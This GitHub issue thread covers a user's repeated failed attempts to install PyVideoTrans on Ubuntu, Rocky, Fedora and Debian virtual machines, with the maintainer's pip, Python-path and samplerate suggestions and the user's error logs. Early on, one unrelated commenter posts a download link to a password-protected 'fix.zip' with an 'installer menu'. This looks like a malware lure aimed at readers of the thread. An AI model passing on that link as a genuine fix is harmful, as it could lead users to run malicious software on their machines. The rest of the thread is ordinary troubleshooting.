### ISSUE TITLE
PyVideoTrans Installed on Ubuntu 22.04.4 LTS QEMU/KVM Guest

### ISSUE THREAD

**Issue by mbennette68** [jianchang512/pyvideotrans#526]
Hi,

### QUESTION:
I'm trying to see if it is possible to install python sp.py  in a **QEMU/KVM** Ubuntu 22.04.4 LTS guest running inside my Pop!_OS 22.04 host machine. My machine has an NVidia Card but it is not really detected by the **QEMU/KVM** guest OS. The guest is using the **Virtio** video device.

I've tried to install on various guests, including the latest **Debian** and F**edora OS**, as well as **Ubuntu 18.04, 20.04** but it generated many errors and the installation of **PyVideoTrans** was not successful. I know there is a way to pass through the video card to the QEMU guest OS but I don't want to do that at the moment since the kernel has to be modified and I don't wish to risk destroying my host OS install. If I can make it work within a virtual machine, then I might risk installing **PyVideoTrans** into a regular machine.

Is it possible to install **PyVideoTrans** on a virtual machine?

### SUGGESTION:
The install instructions are not necessarily the best, as I've run into issues, particularly when I reach the step asking to run:
**python sp.py** which generates certain errors. My main error was failing to notice the needed dependencies which are listed at the end of the page, in the [Acknowledgements](https://github.com/jianchang512/pyvideotrans/blob/main/docs/EN/README_EN.md#acknowledgments) section. That information might be better placed at the top of the page, in my view as well as which OS version numbers are better supported by **PyVideoTrans**.

I think it'd be a better option to use a linux bash script file that would test the system, inform of missing dependencies and then proceed to create the virtual environment, install the software, and download the dependencies as needed. This will reduce errors and frustrations.

Any suggestions or instructions on KVM install would be appreciated.

Thank you,
MB

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by boystray** [comment]
no need GPU,just using cpu to run PyVideoTrans.
change torch with cuda to torch with cpu

**Comment by mbennette68** [comment]
I will see if I can make it work.

Thank you.  :)

**Comment by mbennette68** [comment]
I tried to install PyVideoTrans in Ubuntu 22.04.x LTS but has errors. 

I recorded a [video screen-cast](https://bruh-clips.com/clips/8d8a3cc3) of my issue
if you want to take a look at it. The site will delete the video in two days.

What am I doing wrong?

Thank you,
MB

**Comment by jianchang512** [comment]
1. remove  `pip 23.2.1 from /usr/local/lib/python3.10/site-packages/pip (python 3.10)`  this is comment
2.  sudo update-alternatives --install /usr/bin/python python /usr/local/bin/python3.10   **1**

**Comment by mbennette68** [comment]
Hello,

Did not work. 

sudo update-alternatives --install /usr/bin/python python /usr/local/bin/python3.10 1 does not add pyththon3.10 to /usr/local/bin. 

Perhaps not enough permissions?

Here is an image of what I got:
![ub2204-lts_pytransvid_error_2024-08-30_15:30:00](https://github.com/user-attachments/assets/5c184d34-2cd5-43e0-84e7-9df2c342226c)

Thank you,
MB

**Comment by jianchang512** [comment]
`which python3.10`

Execute the command, see where the returned 3.10 is, and then replace the

**Comment by mbennette68** [comment]
Hi,

I was able to setup Python 3.10.x.
With that being said, there were other errors that prevented the creation of the, "**_sp.py_**" file.

The **_errors_** started with STEP 6:

- **_pip install -r requirements.txt --no-deps_**
- **_pip config set global.index-url https://mirrors.aliyun.com/pypi/simple/_**
- **_pip config set install.trusted-host mirrors.aliyun.com_**
- **_pip install -r requirements.txt  --ignore-installed --no-deps_** 

I was installed **_python3-wheel_** but still it error out.
I've attached the output of the errors from the terminal for your convenience. 
It doesn't look like I can install PyVideoTrans on this Ubuntu 22.04 VM.

![ub-22 04 4-LTS_pytransvid_mirror_error_2024-09-02_16:20:49_3](https://github.com/user-attachments/assets/19057439-f08f-495c-97e7-c75b3fde9c8b)

[pyvideotrans_errors_2.txt](https://github.com/user-attachments/files/16841900/pyvideotrans_errors_2.txt)

Perhaps I'll have better luck with Ubuntu 24.04 LTS?

Thank you,
MB

**Comment by jianchang512** [comment]
`pip uninstall -y cmake` and retry

**Comment by mbennette68** [comment]
Hi,

I tried ...

- _**pip uninstall -y cmake**_
- _**pip install --upgrade wheel pip**_
- _**pip install --upgrade wheel pip cmake**_
- _**venv**_
- _**miniconda**_

I still get errors. 

I've attached an image and file with the terminal output and errors:
[pyvideotrans_errors_3.txt](https://github.com/user-attachments/files/16853465/pyvideotrans_errors_3.txt)

![pyvidtras_conda_2024-09-03 11-54-06](https://github.com/user-attachments/assets/8e0a7e1f-eb51-426a-af17-45e1c846aa7f)

I can't find the cause of the **_Subprocess Error_**  :(

Thank you,
MB

**Comment by jianchang512** [comment]
Open `requirements.txt` and delete the `samplerate==` line. Then reinstall it and `pip install samplerate` separately after successful installation.

**Comment by mbennette68** [comment]
Hi,

Installing samplerate seperately did not solve the issue.

Here's the terminal output file:
[pyvideotrans_errors_4.txt](https://github.com/user-attachments/files/16897266/pyvideotrans_errors_4.txt)

It includes the miniconda3 environment information + packages installed.

Thanks,
:)

**Comment by jianchang512** [comment]
Try installing in python3 natively, not in conda, it looks like it might be a compiler mismatch!

**Comment by mbennette68** [comment]
Hi,

That possibility has been stuck in my mind, so I decided to switch to another Linux OS to test that possibility.

I decided to use Rocky Linux 9.4 (rhel clone) to see if I would get the same errors and I did.
I made a 27 minute video which you can check out [here](https://bruh-clips.com/clips/4945e298).
There are some errors in the install instructions which I found when I tried the install.

It does not look like a compiler mismatch since it has happened on 7 Linux distros, e.g. Ubuntu 18.04/20.04/22.04/24.04 and Fedora 40/Rocky 9.4 and Debian 12.7 though on Debian some of the tools could not be installed as the system could not find them for installation.

I don't know if PyVideoTrans can be installed on my virtual machine. Most of the distros suffer from the same, **_samplerate_**, error :(

I'm exhausted :)

Thanks,
MB

**Comment by jianchang512** [comment]
First, install `pip install samplerate` separately, if no errors are reported, the installation was successful, then run requirements.txt

**Comment by mbennette68** [comment]
Hi,

I just did it in Rocky Linux 9.4 and the same error is generated. 
I tried it with _**cmake**_ installed outside the _**venv**_ and also  installed inside _**venv**_.

![image](https://github.com/user-attachments/assets/7c0e1b62-a80a-486e-ae68-42b30dcfef44)

Python's install path was determined by the instruction on PyVideoTrans site.

Here's a [pyvideotrans_errors_5.txt](https://github.com/user-attachments/files/16902814/pyvideotrans_errors_5.txt) containing the terminal commands and errors.

_**samplerate**_ is not allowing the install to proceed. 

I'll try again tomorrow.

Thanks,
MB :)

**Comment by mbennette68** [comment]
Hi,

I gave it a final try using Ubuntu 22.04 LTS steps, and changed a few things but it still failed, and corrupted my **_Virtual Machine installs_** everytime. Main problem for ubuntu steps is _**"/usr/local/bin/python3.1x"**_ and _**"/usr/bin/python3.1x**_ locations". Given these errors, I don't wish to install it on an baremetal hardware until all issues are fixed.

Here's the **_[pyvideotrans_errors_7_09-09-24.txt](https://github.com/user-attachments/files/16937781/pyvideotrans_errors_7_09-09-24.txt)_** with the results.

Here's a **_[longer video](https://bruh-clips.com/clips/756f1339)_** of the errors I got.

I can't resolve the issue. 

Thank you for your help,
:)
